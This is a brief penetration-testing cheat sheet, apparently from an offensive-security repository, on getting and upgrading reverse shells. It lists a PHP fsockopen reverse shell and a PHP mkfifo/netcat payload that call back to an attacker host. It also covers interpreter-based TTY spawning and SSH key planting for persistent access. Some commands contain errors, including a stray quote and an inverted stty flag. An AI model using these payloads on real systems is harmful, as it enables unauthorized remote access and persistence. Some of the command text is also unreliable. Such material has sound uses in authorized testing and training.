killchain-compendium/reverse_shells/docs/shell_upgrade.md

1.0 KiB

Upgrade Reverse Shell

Via interpreter

PHP

  • reverse shell
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r 'exec ("/bin/bash")";' 
  • Sometimes even
php -e 'exec "/bin/bash";'

Python

python -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'exec "/bin/sh";'

Script

/usr/bin/script -qc /bin/bash /dev/null

Next

  1. ctrl + z
  2. stty echo -raw
  3. fg
  4. export TERM=xterm

Via SSH

  • ssh-keygen
  • copy priv key and chmod 600
  • cat id_rsa.pub > authorized_keys on target

As Code

PHP

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>